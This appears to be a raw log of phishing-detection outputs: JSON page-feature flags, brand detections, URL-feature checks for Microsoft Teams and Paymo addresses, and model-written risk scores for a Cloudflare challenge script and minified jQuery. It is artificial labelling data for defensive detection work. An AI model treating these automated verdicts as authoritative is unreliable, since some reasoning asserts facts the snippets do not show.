EZJrqiNJMx_z1gWAgB9MZjAdXxeQuHly6sB6PavVKPy6chG_RyKnNC5YfTT3JDeAjFMwrTtmBVcyi0J8Tbo9O1ejl2_CV6ZvDIPEMpC39gdnhMK5CDV5Q8duKzY3.lqA0CtDTAGEot1HIkkiecqEA3aPJKz_W4j0wjiRenVg8D6lXgjCQtbDSZhBC1RQKAYLWmSZGLPGGcBNbVGMtzY5cgxCYaXAwWneadlOc7yi3dQ6MLKIR0UN_4Sewv_WlrsIfFLOrFalt1XzH.PbFSwMvq4V66iAsVpWVSKkaEreZJezR9WumYEJpnCAojqxuATVR6Awewy1fHe7.priZGDSSKBLN.7X_Nok6tb98Ksauevq09p44P0xZpc9x17SYeuTIYVLinUMdJSVbejhW1LDVkUbwZbtW_CXqOPClk73vzsYlzKC366a8ynvvYM6wiKJqOYkycNobkKxsyu3U5Hg0bAcXVOIBlITfhQ2tMHB2WGAvajE85QgnMQANHMvfJ1lh18CwCdy0MT3srkiw1tw',
                cITimeS: '1734624651',
                refresh: function(){
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: 'wy4oj',
                            nextRcV: '3v.FAj6A9yXFK1qX73PnNW6xs49R1PjnhXsf7aChzNg-1734624651-1.3.1.1-AvUZWMc38xD2N6z7BD4LGNKTBB4_Oo_Tnmf9T3F9EeI',
                            event: 'reloadRequest',
                        }, "*");
                    }
                }
            };
            var handler = function(event) {
                var e = event.data;
                if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: window._cf_chl_opt.chlApiWidgetId,
                            event: 'food',
                            seq: e.seq,
                        }, '*');
                    }
                }
            }
            window.addEventListener('message', handler);
        }());
    

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Cloudflare"
  ]
}

{
  "brands": "unknown"
}

```json
{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script primarily focuses on defining utility functions and extending jQuery's functionality. As it interacts with trusted domains and serves a legitimate purpose, it is considered low risk."
}

/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s

{
    "risk_score": 1,
    "reasoning": "This script appears to be using the `performance.now()` method to measure the time it takes to read the 'index.html' file. It sets a performance mark based on whether the time taken is greater than 5 seconds or not. This is a common performance optimization technique and does not exhibit any high-risk behaviors."
}

performance.now()>5e3?performance.mark("slow-read-index-html"):performance.mark("read-index-html")

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://teams.microsoft.com

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://app.paymoapp.com

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}

{
  "contains_trigger_text": true,
  "trigger_text": "CLIQUE AQUI PARA FAZER O DOWNLOAD",
  "prominent_button_name": "CLIQUE AQUI PARA FAZER O DOWNLOAD",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "LOGO"
  ]
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://paymoapp.com